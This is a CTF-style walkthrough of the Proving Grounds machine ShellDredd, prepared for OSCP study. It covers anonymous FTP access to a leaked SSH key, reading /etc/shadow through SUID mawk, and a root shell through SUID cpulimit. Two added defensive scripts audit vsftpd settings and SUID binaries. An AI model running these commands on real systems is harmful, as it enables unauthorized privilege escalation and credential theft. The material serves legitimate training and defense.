Offensive Security Proving Grounds OnSystemShellDredd Writeup | OSCP Writeup
The article details a penetration testing walkthrough for the Offensive Security Proving Grounds (OSPG) machine named ShellDredd, useful for OSCP (Offensive Security Certified Professional) preparation.
It covers key stages: information gathering with Nmap, gaining initial access via FTP anonymous login, using an SSH private key for further access, and performing Linux privilege escalation.
The guide highlights tools like GTFOBins for exploiting binaries like Mawk and Cpulimit to achieve root access.
Information Gathering & Enumeration
Nmap Scanning and the open ports
nmap -p- --open -sV -sT -sC 192.168.191.130 -v -oN nmap
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.250
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
61000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
FTP Anonymous Login
FTP Anonymous login can be discovered by trying “anonymous” as the username and password.
ftp 192.168.191.130 21
Connected to 192.168.191.130.
220 (vsFTPd 3.0.3)
Name (192.168.191.130:naveenj): anonymous
331 Please specify the password.
Password:
230 Login successful.
SSH private key can be found after enumerating the directory content:
ftp> ls -lsa
ftp> cd .hannah
-rwxr-xr-x 1 0 0 1823 Oct 12 2024 id_rsa
226 Directory send OK.
ftp> get id_rsa
226 Transfer complete.
1823 bytes received in 00:00 (8.97 KiB/s)
ftp>
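Two misconfigurations hand over the key above: anonymous login is enabled, and a private key sits under the anonymous root with world-readable permissions (0755). The following shell script is an added example, not code from the writeup, that checks for both from the defender's side. The vsftpd config file, the directory tree and the key file contents are all constructed by the script's own build_demo function; the key material is a placeholder string, not a real key.

```shell
#!/bin/sh
# Added example (not from the original writeup): check a vsftpd configuration
# for anonymous login and scan the anonymous root for world-readable private
# keys, the two conditions that exposed hannah's id_rsa above.
# The config file and directory tree are constructed by build_demo; the key
# material inside is a placeholder, not a real key.

# vsftpd_anon_enabled CONF: returns 0 when anonymous login is on.
# A missing anonymous_enable line counts as enabled, matching vsftpd's
# documented default of YES; when the key appears more than once we take
# the last assignment.
vsftpd_anon_enabled() {
    conf="$1"
    val=$(sed -n 's/^[[:space:]]*anonymous_enable[[:space:]]*=[[:space:]]*\([A-Za-z]*\).*/\1/p' "$conf" | tail -n 1)
    [ -n "$val" ] || val=YES
    case "$val" in
        [Yy][Ee][Ss]) return 0 ;;
        *)            return 1 ;;
    esac
}

# find_exposed_keys ROOT: prints every other-readable regular file under ROOT
# whose contents look like a PEM/OpenSSH private key. find descends into
# dot-directories such as .hannah, which ls -a also shows over FTP.
find_exposed_keys() {
    find "$1" -type f -perm -004 2>/dev/null | while IFS= read -r f; do
        if grep -q -e '-----BEGIN .*PRIVATE KEY-----' "$f" 2>/dev/null; then
            printf '%s\n' "$f"
        fi
    done
}

# build_demo: constructed fixture mirroring the writeup's layout (hidden
# .hannah directory holding a 0755 id_rsa). Prints the temp dir path.
build_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/ftp/.hannah"
    printf 'listen=YES\nanonymous_enable=YES\nanon_root=%s\n' "$d/ftp" > "$d/vsftpd.conf"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed-placeholder' \
        '-----END OPENSSH PRIVATE KEY-----' > "$d/ftp/.hannah/id_rsa"
    chmod 755 "$d/ftp/.hannah/id_rsa"
    printf 'public readme\n' > "$d/ftp/readme.txt"
    chmod 644 "$d/ftp/readme.txt"
    printf '%s\n' "$d"
}

demo=$(build_demo)
if vsftpd_anon_enabled "$demo/vsftpd.conf"; then
    echo "anonymous login is enabled; set anonymous_enable=NO unless it is required"
    echo "world-readable private keys under the anonymous root:"
    find_exposed_keys "$demo/ftp"
fi
rm -rf "$demo"
```

On a real host, point vsftpd_anon_enabled at /etc/vsftpd.conf and find_exposed_keys at the configured anon_root (or the ftp user's home when anon_root is unset). The fix is the same in both cases: anonymous_enable=NO where anonymous access is not a business requirement, and private keys never stored under a shared root, let alone with mode 0755.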
First Foothold Using SSH
ssh -i files/id_rsa hannah@192.168.191.130 -p 61000
hannah@ShellDredd:~$
Linux Privilege Escalation
Binary Exploitation
We can search the file system for binaries with the SUID bit set, since these run with the owner's privileges regardless of who invokes them.
hannah@ShellDredd:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk #--strange binary
Mawk from the above output stands out.
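Spotting the odd one out in that list by eye works on a CTF box, but on a fleet it is a baseline comparison. The script below is an added example, not part of the writeup, that flags SUID binaries absent from a known-good list. BASELINE_SUID is a constructed sample of paths expected on a stock Debian install; the sample input reuses the writeup's find output plus a cpulimit path whose location is a placeholder (the writeup runs it as ./cpulimit without giving a full path).

```shell
#!/bin/sh
# Added example (not from the original writeup): compare the SUID binaries
# found on a host against a known-good baseline and flag the rest.
# BASELINE_SUID is a constructed sample of SUID paths that are expected on a
# stock Debian install; seed a real audit from a clean install of the same
# release, not from this list.
BASELINE_SUID='
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mount
/usr/bin/su
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
'

# flag_unexpected_suid: reads SUID paths from stdin, one per line, prints every
# path that is not in BASELINE_SUID, and returns 1 if anything was printed.
flag_unexpected_suid() {
    found=0
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if printf '%s\n' "$BASELINE_SUID" | grep -Fxq -- "$path"; then
            continue            # on the baseline, nothing to report
        fi
        printf '%s\n' "$path"
        found=1
    done
    return "$found"
}

# audit_live_suid: the same check against the running system. -perm -4000 is
# the octal form of the writeup's -perm -u=s; -xdev keeps find off network
# and pseudo filesystems.
audit_live_suid() {
    find / -xdev -perm -4000 -type f 2>/dev/null | flag_unexpected_suid
}

# Constructed sample input: the writeup's find output plus a cpulimit path
# (placeholder location; the writeup invokes it as ./cpulimit).
SAMPLE_SUID='/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk
/usr/bin/cpulimit'

if printf '%s\n' "$SAMPLE_SUID" | flag_unexpected_suid; then
    echo "no unexpected SUID binaries"
else
    echo "unexpected SUID binaries listed above: verify each, then remove the bit with chmod u-s"
fi
```

Run audit_live_suid from a cron job or configuration-management check and alert on a non-zero exit; both mawk and cpulimit are on GTFOBins precisely because neither has any business carrying the SUID bit, and chmod u-s on each closes the path this writeup takes.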
What is Mawk in Linux?
In Linux, mawk is an implementation of the AWK programming language, optimized for efficiency and performance. It is used for text processing, particularly for extracting, manipulating, and reporting on data.
mawk processes lines of text based on user-defined patterns and actions, making it useful for tasks like searching text, performing calculations, and automating repetitive text-based tasks. It is typically faster and smaller than other AWK versions, such as the original AWK or gawk.
Exploiting Mawk Using GTFOBins
From GTFOBins:
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
We can apply the above practically and read the password hashes for the users root and hannah.
hannah@ShellDredd:~$ mawk '//' "/etc/shadow" | grep -iE 'root|hannah'
Then we can copy the shadow and passwd files to the attacking machine and combine them with unshadow:
unshadow passwd shadow > hashes
But this leads to a dead end if you try to crack the hashes with John the Ripper or hashcat, so this step is mentioned for informational purposes only.
Exploiting Cpulimit using GTFOBins
What is Cpulimit?
cpulimit is a command-line utility in Linux that allows users to limit the CPU usage of a specific process. It is useful when you want to restrict a process from using too much CPU, ensuring that it does not consume all available resources, which could impact system performance or other processes. Unlike the nice or renice commands, which prioritize CPU access for processes, cpulimit actively throttles the CPU usage of a given process.
Here’s a basic example of how you might use cpulimit:
sudo cpulimit -p 12345 -l 30
In this example, -p 12345 selects the process with PID 12345 and -l 30 caps it at 30% CPU usage.
Example:
To limit a process called myprocess to 20% CPU usage, you can run:
sudo cpulimit -e myprocess -l 20
Limitations:
From GTFOBins:
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
Applying this practically:
./cpulimit -l 100 -f -- /bin/sh -p
# whoami
root